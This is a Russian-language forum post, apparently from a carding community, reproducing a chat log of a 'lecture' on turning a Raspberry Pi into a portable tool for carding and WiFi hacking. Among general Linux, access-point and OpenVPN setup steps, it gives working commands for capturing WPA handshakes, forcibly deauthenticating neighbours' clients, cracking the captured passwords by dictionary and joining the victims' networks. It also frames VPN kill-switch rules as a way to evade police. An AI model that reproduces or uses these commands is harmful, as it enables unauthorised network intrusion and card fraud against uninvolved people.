Что нового?

ИНТЕРЕСНО Лекция от ауди (лог)

Al Sinatra

Знаменитый
МОДЕРАТОР
PAYPAL GROUP
ЮБИЛЕЙНАЯ ЛЕНТА

Al Sinatra

Знаменитый
МОДЕРАТОР
PAYPAL GROUP
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
4 Июн 2018
Сообщения
1,526
Симпатии
367
eRUB
2,644
ГАРАНТ
1

#1
Приветствую вас, дорогие друзья

На лекции мы поговрим о таком замечательном устройстве как Raspberry. Это миникомпьютер, который можно использовать абсолютно для разных целей: кардинг, безопасность, взлом WiFi, SSH, VPN, SOCKS... Я обучу вас настройке и использование этим чудо устройством под названием Raspberry. Он очень мобилен, его можно брать с собой практически везде, поместив его в карман своей куртки или рюкзака. А так же мы подробно поговорим об настройки ведра (андроида) под вбив (для кардеров), и разберем все нюансы касающиеся сс.

Темы лекции:
1. Запись образа, настройка и подключение через терминал по SSH.
2. Маленький FAQ по командам для терминала Raspberry.
3. Настройка Raspberry. Подробно и много.
4. Взлом WIFI. Подробно.
5. OPEN VPN. Настройка и подключение. Запрет трафика при обрыве.
6. PPTP. Скрипт от LimonCorp.
7. SOCKS4, SOCKS4a, SOCKS5, SOCKS5+.
8. SSH.
9. Ip Limon. Команды для чека IP адресов, в том числе и SOCKS.
10. Подмена MAC адреса на Raspberry
11. Картинг. Soft для телефона, использование и настройка. Подробно.

12. Мини лекция по сс (картам).

================================================================

Володя Путен, [09.09.19 12:33]
В сегодняшней лекции конкретика будет касаться безопасной и прекрасной работы с распбери

Володя Путен, [09.09.19 12:34]
купить девайс можно например здесь:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:34]
или в рф на авито

Володя Путен, [09.09.19 12:34]
или в укр на олх

Володя Путен, [09.09.19 12:35]
На лекции мы поговрим о таком замечательном устройстве как Raspberry. Это миникомпьютер, который можно использовать абсолютно для разных целей: кардинг, безопасность, взлом WiFi, SSH, VPN, SOCKS... Я обучу вас настройке и использование этим чудо устройством под названием Raspberry. Он очень мобилен, его можно брать с собой практически везде, поместив его в карман своей куртки или рюкзака. А так же мы подробно поговорим об настройки ведра (андроида) под вбив (для кардеров), и разберем все нюансы касающиеся сс.

Володя Путен, [09.09.19 12:35]
Для тех кому интересны атаки на вайфай сети я советую приобрести адаптер и антену

Володя Путен, [09.09.19 12:35]
Адаптер:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


Антены:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:36]
Мои рекомендации по поводу адаптера и антены:
Адаптер:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


Стоит заметить что текущий адаптер требует к себе две антены, это денежно затратно но оно того стоит
Антены советую брать эти, 2 шт:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:36]
Позже мы поговорим более подробно на эту тему

Володя Путен, [09.09.19 12:36]
Итак, что же такое Raspberry:
Raspberry - это одноплатный миникомпьютер, чуть больше пачки сигарет, или совсем новые модели чуть больше пачки спичек. Их существует несолько видов, модель Zero, модели B/B+/2B/3B/3B+, модель A+/3A+.

Володя Путен, [09.09.19 12:36]
Состоит он из четырехслойной печатной платы, дополнительно к нему применяются блок питания, флэшка, корпус, а так же при необходимости и усиленная WIFI антена. Сегодня мы разберем пример работы данного устройства модели Raspberry Pi 3B+. Отличие это модели от ее предшественников является встроеный 64 битный процессор, а так же наличие собственного WIFI и Bluetooth. Как я выше уже упомянул, есть и более новые версии, в которых отличие это лишь компаткность (он размером с пачку спичек) а так же отсутствием некоторых выходов (-2 USB например). Хз надо вам эта инфа или нет, но вы читайте :)

Володя Путен, [09.09.19 12:36]
У Разбери есть своя ОС, основанная на UNIX системе DEBIAN, ну чем отличается тот же Windows от Linux, почему Linux безопасней, я рассказывать сегодня не буду. Так же на Raspberry можно установить и Kali Linux, возникший как результат слияния WHAX и Auditor Security Collection. Но сегодня мы тренируемся именно на образе предназначенному для этого миникомпьютера.

Володя Путен, [09.09.19 12:37]
Я заранее подготовил, скачал и установил этот образ, именно STREТCH версии, что значит "укрощенная", то есть без DESCTOP, без рабочего стола. Использовать для управления я буду лишь консоль (терминал).

Володя Путен, [09.09.19 12:37]
Необходимый софт на ноуте для записи Raspberry:
bitvise - через битвайс будем управлять малинкой.
Rufus - форматирование сд и запись
Advanced IP Scanner - сканер айпи.
2018-11-13-raspbian-stretch-full.img - образ линукса
Создать файл ssh без расширения в корне SD

Володя Путен, [09.09.19 12:37]
установка до воли простая, ничем не отличающаяся от установки других юникс систем.

Володя Путен, [09.09.19 12:37]
Вставляем сд в пк
Открываем Rufus, выбираем образ и нажимаем "Запись"
Все как обычно и ничего сложного.

Володя Путен, [09.09.19 12:37]
Дальше НЕОБХОДИМО ОБЯЗАТЕЛЬНО зайти на флэшку, и создать в корне СД файл под названием ssh , без разширения и пустой

Володя Путен, [09.09.19 12:37]
Он необходим нам для нальнейшего подключения к Распбери

Володя Путен, [09.09.19 12:37]
Извлекаем SD и вставляем в Raspberry, подключить LAN от Raspberry к роутеру и включить Raspberry.
Теперь нам необходимо узнать IP нашего Raspberry.
Есть два способа.
1. Узнать через админку в своем роуетере
2. Узнать с помощью Advanced IP Scanner

Володя Путен, [09.09.19 12:38]
Используем вариант №2.
Запускаем Advanced IP Scanner, пишем диапазон айпи адресов, например 192.168.0.1-254, и нажимаем Scan.

Володя Путен, [09.09.19 12:38]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:38]
И вот наше Raspberry первое в списке, и его ип у меня 192.168.0.1.

Володя Путен, [09.09.19 12:38]
Так же можно подключиться напрямую к Raspberry по WIFI, но об этом мы поговорим потом, для начала нужно его настроить.
IP = 192.168.43.1 - если подключаться по WIFI напрямую
Port = 22

Володя Путен, [09.09.19 12:38]
На Raspberry по умолчанию логин: pi , пароль: raspberry, порт: 22

Володя Путен, [09.09.19 12:38]
Запускаем bitvise, вводим текущие данные доя подключения, и нажимаем LOGIN

Володя Путен, [09.09.19 12:39]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:39]
Немножко теории при работе в терминале Linux. Мы будем использовать ряд команд, которые на первый взгляд кажутся сложными, не веселыми :) и не понятно будет, зачем я взял версию STREТCH без рабочего стола. Все просто - мобильность. Я же не буду с собой таскать монитор, например в дальних путешествиях. Я Raspberry бросил в карман и поехал. И при необходимости подключился к нему по WIFI с ноутбука или телефона, и сделал то что мне необходимо.

Володя Путен, [09.09.19 12:39]
Немного команд которые есть жизненно необходимыми. Запишите их себе сразу в блокнотик

Володя Путен, [09.09.19 12:39]
sudo - дает права администратора
apt-get - менеджер пакетов для линукса на базе debian
update - обновление
install - установка
cp - копирование файла или папки
mv - перемещение файла или папки
rm - удаление файла или папки
sudo -s - зайти в учетку как root (администратор)
nano - текстовый редактор в терминале, он умеет также создать новый файл, если его нет.
cat - почитать файл
ls - посмотреть что есть в папке
ifconfig - выводить активные сетевые интерфейсы (карты)
ifconfig -a - выводить все активные и неактивные интерфейсы.
iwconfig - вывод беспроводных интерфейсов.
/etc/ssh/sshd_config - это директория /папка/папка/файл.

Володя Путен, [09.09.19 12:39]
Горячие клавиш в Nano:
ctrl+O - сохранить файл. будет спрашивать сохранить ли, нажимать Enter
ctrl+X - выход из нано
ctrl+K - стереть строку

Володя Путен, [09.09.19 12:39]
Что бы вставить заранее скопированную строку/код/команду в терминале - один раз нажать правую кнопку мыши в терминале

Володя Путен, [09.09.19 12:40]
Пример как создать текстовый файл:
sudo nano text.txt
Почитать файл
sudo cat text.txt

Володя Путен, [09.09.19 12:40]
Первое что мы сделаем, это изменим порт для подключения.
Конфигурировать ssh на Raspberry, чтобы во время работы в bitvise связь не пропала и изменить стандартный порт 22 на другой например 2200
sudo nano /etc/ssh/sshd_config и добавить в конце файла коды

Володя Путен, [09.09.19 12:40]
Port 2200
ClientAliveInterval 300
ClientAliveCountMax 60

Володя Путен, [09.09.19 12:40]
Вставил, сохранил и вышел из нано.

Володя Путен, [09.09.19 12:40]
Далее пишем в терминале команду ifconfig
Эта команда означает "Показать сетевые интерфейсы"

Володя Путен, [09.09.19 12:40]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:40]
Вот так они выглядят. на первый вид хаос полнейший

Володя Путен, [09.09.19 12:40]
Но ничего, со временем к этому привыкаешь быстро и на глаз становится все понятным

Володя Путен, [09.09.19 12:41]
eth0 - это LAN малинки
wlan0 - встроенный вифи малинки.
Когда подключите адаптер вифи к малинке, то появится имя wlan1.

Володя Путен, [09.09.19 12:41]
Что бы посмотреть ВСЕ доступные интерфейсы, добавьте к команде аргумент -а
sudo ifconfig -a

Володя Путен, [09.09.19 12:41]
Приступим к конфигурации. Она необходима будет для каждого. Сделал один раз и все.

Володя Путен, [09.09.19 12:42]
Конфигурируем interfaces
sudo nano /etc/network/interfaces
и добавить В КОНЦЕ конфига код:

Володя Путен, [09.09.19 12:42]
auto eth0
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet dhcp
#pre-up ifconfig wlan0 hw ether 00:00:00:00:00:00
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

auto wlan1
iface wlan1 inet manual
#pre-up ifconfig wlan1 hw ether b8:27:eb:00:00:00

auto br0
iface br0 inet static
address 192.168.44.1
netmask 255.255.255.0
bridge_ports wlan1

Володя Путен, [09.09.19 12:42]
Решетка на против строки обозначает "закомментрировать", то есть закомментрированная строка работать не будет. Что бы строка работала, ее необходимо раскомментировать, то есть убрать решетку. В данный момент оставляем все как есть.

Володя Путен, [09.09.19 12:43]
Дальше переходим к установке необходимых библиотек для работы hostapd, dnsmasq, bridge-utils
sudo apt-get install -y hostapd
sudo apt-get install -y bridge-utils dnsmasq
sudo nano /etc/hostapd/hostapd.conf
И вставить код

Володя Путен, [09.09.19 12:43]
ssid=WIFI_Limon
wpa_passphrase=12345432

interface=wlan1
bridge=br0
driver=nl80211

hw_mode=g
channel=6
ieee80211n=1
wmm_enabled=1
ht_capab=[HT40][SHORT-GI-20][DSSS_CCK-40]

macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

Володя Путен, [09.09.19 12:43]
Я сначала распишу все что необходимо сделать а уже потом буду объяснять зачем это все

Володя Путен, [09.09.19 12:43]
Где
WIFI_Limon - название вашего WIFI, который будет раздаваться.
12345432 - пароль к вашему WIFI

Володя Путен, [09.09.19 12:43]
Включить автозагрузку нашей конфигурации
sudo sed -i /etc/default/hostapd -e '/DAEMON_CONF=/c DAEMON_CONF="/etc/hostapd/hostapd.conf"'

Володя Путен, [09.09.19 12:43]
Разрешить выдавать айпи интерфейсам для раздачи
sudo nano /etc/sysctl.conf
И добавить в конце конфига код

Володя Путен, [09.09.19 12:44]
### Controls IP packet forwarding ###
net.ipv4.ip_forward = 1
#net.ipv6.conf.all.forwarding = 1

### Deny IPv6 ###
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1

### Deny input ICMP ###
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_echo_ignore_all = 1

### Controls the use of TCP syncookies ###
net.ipv4.tcp_syncookies = 1

### Turn on SYN-flood protections ###
net.ipv4.tcp_syn_retries = 5
net.ipv4.tcp_synack_retries = 5

Володя Путен, [09.09.19 12:44]
Конфигурация dnsmasq
Сначала удалим оригинальный конфиг:
sudo rm /etc/dnsmasq.conf

Володя Путен, [09.09.19 12:44]
И потом создадим новый:
sudo nano /etc/dnsmasq.conf
И добавить код:

Володя Путен, [09.09.19 12:44]
interface=br0
listen-address=192.168.44.1
bind-interfaces
domain-needed
bogus-priv
no-poll
no-resolv
server=8.8.8.8
stop-dns-rebind
clear-on-reload
dhcp-option=3,192.168.44.1
dhcp-option=6,192.168.44.1
dhcp-range=192.168.44.70,192.168.44.150,12h
dhcp-authoritative

Володя Путен, [09.09.19 12:44]
Теперь настроим фаервол.
iptables - пополярный фаерволл для Linux. Он есть во всех Linux системах.
Прописать три правила

Володя Путен, [09.09.19 12:44]
sudo iptables -t nat -A POSTROUTING -o wlan+ -j MASQUERADE
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -t nat -A POSTROUTING -o tun+ -j MASQUERADE

Володя Путен, [09.09.19 12:44]
При перезагрузке эти правила исчезнут, по этому нам необходимо установить библиотеку iptables-persistent что бы сохранить эти правила:
sudo apt-get install -y iptables-persistent

Володя Путен, [09.09.19 12:44]
При установке спросят сохранить ли правила для IPV4, нажимать ДА (YES), второй вопрос для IPV6, выбор YES или NO не имеет значения, так как IPV6 у нас все-равно отключен.

Володя Путен, [09.09.19 12:45]
Установка скриптов для работы IP SOCKS, тунелей и так далее.

Володя Путен, [09.09.19 12:45]
Сначала зайти в учетку root
sudo -s
sudo nano /etc/apt/sources.list

Володя Путен, [09.09.19 12:45]
Добавить строку:
deb

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

kali-rolling main non-free contrib

Володя Путен, [09.09.19 12:45]
Нажать Ctrl+c

Володя Путен, [09.09.19 12:45]
Далее обновляемся:
sudo apt-get update

Володя Путен, [09.09.19 12:45]
Смотрим сетевые интерфейсы:
sudo ifconfig -a

Володя Путен, [09.09.19 12:45]
Устанавливаем библиотеку для работы с сетевым трафиком:

Володя Путен, [09.09.19 12:45]
sudo apt-get install aircrack-ng

Володя Путен, [09.09.19 12:46]
После окончания установки:
sudo nano /etc/apt/sources.list
И поставить решетку перед строкой: #deb

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

kali-rolling main non-free contrib

Володя Путен, [09.09.19 12:46]
То есть закомментировать как я ранее говорил

Володя Путен, [09.09.19 12:46]
Нажать снова Ctrl+C

Володя Путен, [09.09.19 12:46]
Снова апдейтимся:
sudo apt-get update

Володя Путен, [09.09.19 12:46]
И дальше, для тех кто приобрел к примеру антены которые я советовал и адаптер Альфу, мы устанавливаем драйвера

Володя Путен, [09.09.19 12:46]
sudo apt-get install -y bc git dkms libncurses5-dev

Володя Путен, [09.09.19 12:46]
sudo wget "

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

" -O /usr/bin/rpi-source
sudo chmod 755 /usr/bin/rpi-source
sudo rpi-source
git clone

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


cd rtl*
sudo sed -i 's/CONFIG_PLATFORM_I386_PC = y/CONFIG_PLATFORM_I386_PC = n/g' Makefile
sudo sed -i 's/CONFIG_PLATFORM_ARM_RPI = n/CONFIG_PLATFORM_ARM_RPI = y/g' Makefile
sudo ./dkms-install.sh

Володя Путен, [09.09.19 12:46]
Каждая команда начинается с новой строки

Володя Путен, [09.09.19 12:46]
После установки всего перезагружаем Raspberry

Володя Путен, [09.09.19 12:47]
Все, наш Raspberry настроен. Настроил WIFI, установил все необходимые библиотеки для работы, а так же весь необходимый софт, и соответственно установил драйвера для адаптера Alfa и подключил к нему аентены на 19DBI. Примерный радиус приема этих антен составляет 2-3км, но при отсутствии помех радиус может достигать 5ти километровэ

Володя Путен, [09.09.19 12:47]
Например я антены выставил за окно, но накрыл их типа мини крышей что бы на них влияло минимум погодных условий, хотя они предназначены для использования под открытым небом

Володя Путен, [09.09.19 12:47]
Если это тв квартире допустим то за окно можно не выставлять

Володя Путен, [09.09.19 12:47]
Немножко об оборудовании Alfa, которое я буду использовать

Володя Путен, [09.09.19 12:47]
В качестве примера я буду использовать:

Володя Путен, [09.09.19 12:47]
Антены, кол. 2 шт.: WI FI АНТЕННА ПАНЕЛЬНАЯ ALFA NETWORK APA-L2419 -19ДБ

Володя Путен, [09.09.19 12:47]
Адаптер, кол. 1 шт.: WI FI АДАПТЕР ALFA AWUS036ACH

Володя Путен, [09.09.19 12:47]
Вот тут внимание при покупке

Володя Путен, [09.09.19 12:47]
ИСКЛЮЧИТЕЛЬНО производство Тайвань. Компания Лондонская, но завод изготовитель находится в Тайване. На сегодняшний день продается слишком много подделок. По адаптеру, обязательно учитывать какой чипсет стоит в адаптере.

Володя Путен, [09.09.19 12:48]
Чипсет (касательно версии данного аппарата) должен быть RTL9912AU, технические характеристики данного оборудования вы можете найти в интеренете. Не всегда нужно брать две антены, если адаптер на один выход, то и антена необходима лишь одна. В данном адаптере необходимо две антены

Володя Путен, [09.09.19 12:48]
В РФ оригинальную Alfa можно купить по ссылкам:
Адаптер:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


Антены:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:48]
Для взлома WIFI сетей я установил AirCrack

Володя Путен, [09.09.19 12:48]
Начнем пожалуй именно с этого. Со взлома WIFI. Уверен что каждый из вас задавался вопросом, как же блин взломать вифи соседа когда у самого интернет не оплачен))))

Володя Путен, [09.09.19 12:48]
Есть разные способы взлома WIFI сетей, сегодня я опишу способ взлома посредством собирания хендшейков (handshake), это файл рукопожатия (синхранизации) между роутером и пользователем в момент авторизации

Володя Путен, [09.09.19 12:48]
Первое что необходимо сделать, это посмотреть, какой сетевой интерфейс у Alfa адаптера. Сделать это можно с помощью команды:
sudo airmon-ng

Володя Путен, [09.09.19 12:48]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:48]
Итак, мы знаем что наш интерфейс это wlan1

Володя Путен, [09.09.19 12:49]
далее необходимо перевести его в режим мониторинга. Это можно сделать несколькими способами, да и собственно сам WIFI можно взламывать несколькими способами. Самый простой способ это:
sudo airmon-ng start wlan1

Володя Путен, [09.09.19 12:49]
Но мы же простых путей не ищем, правда? Пойдем другим способом с усилением сигнала антены

Володя Путен, [09.09.19 12:49]
Деактивировать Альфу
sudo ip link set wlan1 down

Володя Путен, [09.09.19 12:49]
Перевести в режим мониторинга
sudo iw dev wlan1 set type monitor

Володя Путен, [09.09.19 12:50]
Активировать Альфу:
sudo ip link set wlan1 up

Володя Путен, [09.09.19 12:50]
Усилить сигнал:
sudo iwconfig wlan1 txpower 30

Володя Путен, [09.09.19 12:51]
Смотреть доступные для атаки точки доступа
Sudo airodump-ng wlan1

Володя Путен, [09.09.19 12:51]
Я живу в дебрях, по этому у меня ближайший WIFI может быть в метрах 250, и так через каждые 250 метров по радиусу. По этому у меня не сильно много будет WIFI точек, но все же:

Володя Путен, [09.09.19 12:51]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:51]
BSSID - это МАС адрес роутера
PWR- это сигнал
ENC -это тип сети
WPA2 - это сеть запароленная,
OPN соответственно незапароленная.
Сегодня мы разбираем взлом запароленых сетей.
ESSID - это название точки доступа.
CH - канал роутера

Володя Путен, [09.09.19 12:51]
В принципе это то что нас будет интересовать в данной таблице

Володя Путен, [09.09.19 12:51]
Когда определитесь с точкой доступа, которую будем атаковать, останавливаем мониторинг Ctrl+C

Володя Путен, [09.09.19 12:51]
Открываем новый терминал (этот не закрываем), и запускаем сбор хендшейков с определенного роутера:
sudo airodump-ng --bssid 24:65:C9:C1:B3:22 -c 7 -w WifiVasy wlan1

Володя Путен, [09.09.19 12:52]
24:65:C9:C1:B3:22 - MAC адрес роутера
-c 7 - канал роутера
-w WifiVasy - название файла в который будем записан hadshake.

Володя Путен, [09.09.19 12:52]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:52]
1 и 2 - это MAC адрес роутера
3 - мак адрес клиента, подключенного к роутеру
4 - название точки доступа.

Володя Путен, [09.09.19 12:52]
Собирать хендшейки можно долго, но для увеличения скорости сбора придумали принудительную деактивацию клиента от роутера. Хендшейк ловится в момент подключения клиенита к роутеру. И для этого у нас есть все необходимое: роутер, клиент, raspberry

Володя Путен, [09.09.19 12:52]
Открываем ЕЩЕ один терминал, и в нем пишем команду:
sudo aireplay-ng -0 10 -a 24:65:C9:C1:B3:22 wlan1

Володя Путен, [09.09.19 12:52]
0 - означает деаунтефикация
10 - количество запросов на деактивацию
24:65:C9:C1:B3:22 - MAC адрес роутера

Володя Путен, [09.09.19 12:52]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 12:53]
Вот так выглядит принудительная деаунтефикация клиента от роутера, простыми словами отключить соседа от его вайфая что бы он автоматически снова начал подключатьсяэ

Володя Путен, [09.09.19 12:53]
Итак, мы послали 10 запросов на деаунтефикацию клиентов от роутера. Это можно делать на определенного клиента, вот почему я выше подчеркнул, что у нас есть так же мак адрес клиента. Атака на определенного клиента-роутер можно осуществить следующей командой:
sudo aireplay-ng -0 10 -a 24:65:C9:C1:B3:22 -с 76:23:А4:S7:B8:98 wlan1

Володя Путен, [09.09.19 12:53]
Где -с 76:23:А4:S7:B8:98 - MAC адрес клиента

Володя Путен, [09.09.19 12:53]
В основном терминале (где вы писали команду sudo airodump-ng --bssid 24:65:C9:C1:B3:22 -c 7 -w WifiVasy wlan1) в правом верхнем углу появится надпись [WPA handshake: <MAC>], она говорит нам о том, что хендшейк уже захвачен (помйман)

Володя Путен, [09.09.19 12:53]
В дальнейшем я расскажу о другом способе сбора хендшейков с WIFi сетей, а так же о другом способе взлома, посредством сбора PMKID,в котором не нужно будет расшифровывать пароль. Ну всмысле когда нибудь расскажу

Володя Путен, [09.09.19 12:54]
А для тех кто хочет результат не меньше вышеописанный но не хочет ебаться со всем этим, аиркрек придумал автоматический сбор хэндштеков со всех точке доступа

Володя Путен, [09.09.19 12:54]
Автоматический сбор рукопожатий с помощью besside-ng
sudo besside-ng wlan1

Володя Путен, [09.09.19 12:55]
Перекур извините отъехать нужно срочно, через 40 минут продолжим.

Володя Путен, [09.09.19 12:55]
Вопросы сможете задать после лекции или в течении лекции если пожелаете

Володя Путен, [09.09.19 12:56]
Если у кого есть вопросы по текущему материалу - пишите. вернусь скоро и отвечу.

Володя Путен, [09.09.19 13:50]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 13:50]
Мы остановились на сборе хэндшейков при взломе вифи

Володя Путен, [09.09.19 13:50]
Допустим мы поймали нужный хендшейк, заходим по SFTP на Raspberry, в корневую папку. Нас интересует файл с расширением .cap

Володя Путен, [09.09.19 13:51]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 13:51]
О том как взламывать такие файлы по словарю я могу каждому индивидуально,если это будет кому интересно, это довольно трудоемкий процесс. Но для наглядности покажу примерный процесс чуть ниже

Володя Путен, [09.09.19 13:51]
Если у вас есть достойные словари по подбору пароля (в интернете их тысячи), то бросаем их в корень домашней директории, и вводим следующую команду:
aircrack-ng -w /home/pi/slovar.txt -e dlink WifiWasy.cap

Володя Путен, [09.09.19 13:51]
Где:
/home/pi/slovar.txt - путь к словарю
dlink - название точки доступа
WifiWasy.cap - название хендшейка, который мы поймали.

Володя Путен, [09.09.19 13:51]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 13:51]
И вот так вот идет перебор пароля по словарю:

Володя Путен, [09.09.19 13:51]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 13:52]
Естественно я заренее добавил в словарь гдето в середину пароль от WIFI, который я брутил, что бы показать вам как выглядит пойманный пароль к точке доступа. Словарь у меня был из 500 слов, мощность компьютера у меня никак не для брута (скорость брута зависит от мощности комрьютера, на достаточной мощности пароль перебирается по 300 тысяч слов в секунду, в моем случаи это примерно 170 слов в секунду), по этому у меня нашло пароль быстро, аж за 3 секунды

Володя Путен, [09.09.19 13:52]
Вот так вот выглядит сбрученный пароль:

Володя Путен, [09.09.19 13:52]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 13:52]
Но есть сайты которые делают это все за вас, за небольшое приемлемое вознаграждение

Володя Путен, [09.09.19 13:52]
Например:
Сайт

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

, брутят пароль быстро, у них очень хорошие мощностя.

Володя Путен, [09.09.19 13:53]
Вот как пример из ЛК кабинета этого сайта:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 13:53]
Как видим, два пароля уже восстановлено, и еще один на второй странице, его не видно. То есть к троим соседям я уже могу подключиться

Володя Путен, [09.09.19 13:53]
По взлому WII закончим пожалуй, это была маленькая демонстрация во взлому соседей

Володя Путен, [09.09.19 13:53]
Допустим мы взломали пароль от соседа, сканируем сеть:
sudo iwlist wlan1 scan

Володя Путен, [09.09.19 13:53]
У нас будет информация такого вида:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 13:53]
Нас интересует нужный нам ESSID и Adress, если вдруг вы его не записали ранее, хотя он так же есть в лк того сайта который расшифровал ваш пароль

Володя Путен, [09.09.19 13:54]
дальше заходим в конфигурационный файл:

Володя Путен, [09.09.19 13:54]
sudo nano /etc/wpa_supplicant/wpa_supplicant.conf

Володя Путен, [09.09.19 13:54]
И в самом низу вставляем код:
network={
ssid="The_ESSID_from_earlier"
psk="Your_wifi_password"
}

Володя Путен, [09.09.19 13:54]
И дальше:
sudo ifdown wlan1
sudo ifup wlan1

Володя Путен, [09.09.19 13:54]
Это мы типа выклбчили сетевой интерфейс и потом снова его включили, перезагрузили считайте без переагрузки Raspberry

Володя Путен, [09.09.19 13:54]
Все. Мы подключены. Проверить можно следующим образом:

Володя Путен, [09.09.19 13:54]
sudo iwconfig

Володя Путен, [09.09.19 13:54]
iFconfog - посмотреть сетевые интерфейсы, а iWconfig посмотреть АКТИВНЫЕ сетевые интерфейсы

Володя Путен, [09.09.19 13:55]

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Володя Путен, [09.09.19 13:55]
Соответственно в зарисованны мною местах будет название точки доступа и мак адрес. В случаи если подключение не удалось - название точки доступа и мак будут отсутствовать

Володя Путен, [09.09.19 13:55]
теперь разберем одну из основных я считаю функций. Это VPN. Основная она потому, что это наша безопасность. Про носки (соксы) мы поговорим потом, натягивать мы их будем поверх VPN

Володя Путен, [09.09.19 13:55]
Следующие скрипты являются собственной разработкой, потому они входят как комплект для личного пользования при индивидуальной разработке. Все это можно настроить и установить самому из источников в интернете в случаи необходимости, я же скриптами лишь упростил пользование этим всем наобором софта, для мобильного использования и переключения.

Володя Путен, [09.09.19 13:56]
Интерфейс VPN у Raspberry называется Tun+

Володя Путен, [09.09.19 13:56]
Есть два типа VPN. С авторизацией и без. Естесевнно у большинства покупные VPN и они обязательно идут с авторизацией. Вот их и разберем. С конфигами без авторизации все просто, если у конфига нет авторизации то делать второй пункт ниже не нужно

Володя Путен, [09.09.19 13:56]
Первое что необходимо сделать, это изменить расширение .ovpn на .conf . Можно скоратить имя. Допустим у меня VPN конфиг под названием limonvpn.conf

Володя Путен, [09.09.19 13:56]
Второе: открыть файл как редактор и найти auth-user-pass и дописать /etc/openvpn/login, то есть должно получится так:
auth-user-pass /etc/openvpn/login

Володя Путен, [09.09.19 13:56]
Третье: создать файл login (без расширения) и прописать в нем:
login
password

Володя Путен, [09.09.19 13:56]
Где login и password - вводить логин и пароль от VPN. Сохранить.

Володя Путен, [09.09.19 13:56]
Четвертое: отправить два файла на Raspberry в домашнюю папку /home/pi с помощью SFTP в Bitvise.

Володя Путен, [09.09.19 13:56]
пятое: теперь необходимо их переместить из домашней директории в другую папку /etc/openvpn . Вспоминаем команды в самом начале которые я давал как FAQ

Володя Путен, [09.09.19 13:56]
sudo mv [откуда] [куда]
sudo mv limonvpn.conf /etc/openvpn/
sudo mv login /etc/openvpn/

Володя Путен, [09.09.19 13:56]
Все. VPN готов.
FAQ для использования:

Володя Путен, [09.09.19 13:57]
OpenVPN
====================
sudo systemctl start openvpn - подключиться к впн
sudo systemctl stop openvpn - отключиться
sudo systemctl restart openvpn - рестарт
sudo systemctl enable openvpn - включить автозагрузку
sudo systemctl disable openvpn - убрать из автозагрузки

Володя Путен, [09.09.19 13:57]
Если в папке /etc/openvpn/ много конфигов - выбрать один конфиг для подключения:
sudo nano /etc/default/openvpn и найти AUTOSTART="name" и расскоментировать и дописать имя конфига без расширения.

Володя Путен, [09.09.19 13:57]
Часто задаются вопросом, можно ли запретить трафик при обрыве VPN, что бы не спалить случайно свой IP или IP своего соседа, к которому потом наведуются люди в синей форме

Володя Путен, [09.09.19 13:57]
Запретить трафик при обрыве VPN.
Добавить правила
sudo iptables -A INPUT -i tun+ -j ACCEPT
sudo iptables -A OUTPUT -o tun+ -j ACCEPT
После изменения фаерволла сохранить правила
sudo netfilter-persistent save

Володя Путен, [09.09.19 13:57]
Удалить правила
sudo iptables -D INPUT -i tun+ -j ACCEPT
sudo iptables -D OUTPUT -o tun+ -j ACCEPT
После изменения фаерволла сохранить правила
sudo netfilter-persistent save

Володя Путен, [09.09.19 13:57]
то же касается остальных скриптов, а это PPTP, SOCKS. SSH, IP CHECK, то для них просто FAQ по использованию, настройкам они не подлежат:

Володя Путен, [09.09.19 13:58]
PPTP Limon
====================
sudo limonpptp pon [IP] [логин] [пароль] - подключиться к PPTP
